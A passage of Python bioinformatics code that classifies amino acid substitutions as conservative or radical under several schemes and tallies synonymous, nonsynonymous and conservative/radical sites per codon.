:"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",("L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"C",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"C",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"C",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"C",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"C",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"C",("Y","H"):"C",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"C",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"C",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"C",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A
"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"C",("Q","N"):"R",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"R",("Q","C"):"R",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"C",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict5 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"R",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T")
:"C",("G","W"):"R",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"C",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"R",("P","A"):"C",("S","A
"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"R",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q"):"C",("F","Q"):"R",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"C",("S","L"):"C",("T","L"):"C",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"C",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict6 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",("G","P"):"C",("G","S"):"R",("G","T")
:"R",("G","W"):"C",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A
"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"R",("T","G"):"R",("W","G"):"C",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict7 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T")
:"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A
"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
totalSynSites = 0.0
totalNonsynSites = 0.0
totalC1Sites = 0.0
totalR1Sites = 0.0
totalC2Sites = 0.0
totalR2Sites = 0.0
totalC3Sites = 0.0
totalR3Sites = 0.0
totalC4Sites = 0.0
totalR4Sites = 0.0
totalC5Sites = 0.0
totalR5Sites = 0.0
totalC6Sites = 0.0
totalR6Sites = 0.0
totalC7Sites = 0.0
totalR7Sites = 0.0
codonNum = 0
for codon in codonList:
if 'N' in codon or '-' in codon:
totalSynSites += 0.729166667
totalNonsynSites += 2.270833333
totalC1Sites += 1.395833333
totalR1Sites += 0.875
totalC2Sites += 1.270833333
totalR2Sites += 1
totalC3Sites += 0.708333333
totalR3Sites += 1.5625
totalC4Sites += 0.895833333
totalR4Sites += 1.375
totalC5Sites += 1.0625
totalR5Sites += 1.208333333
totalC6Sites += 0.854166667
totalR6Sites += 1.416666667
totalC7Sites += 0.8125
totalR7Sites += 1.458333333
else:
currS = 0.0
currN = 0.0
currC1 = 0.0
currC2 = 0.0
currC3 = 0.0
currC4 = 0.0
currC5 = 0.0
currC6 = 0.0
currC7 = 0.0
currR1 = 0.0
currR2 = 0.0
currR3 = 0.0
currR4 = 0.0
currR5 = 0.0
currR6 = 0.0
currR7 = 0.0
site1 = codon[0]
site2 = codon[1]
site3 = codon[2]
if site1 == 'A':
mut1 = 'C' + site2 + site3
mut2 = 'G' + site2 + site3
mut3 = 'T' + site2 + site3
elif site1 == 'C':
mut1 = 'A' + site2 + site3
mut2 = 'G' + site2 + site3
mut3 = 'T' + site2 + site3
elif site1 == 'G':
mut1 = 'A' + site2 + site3
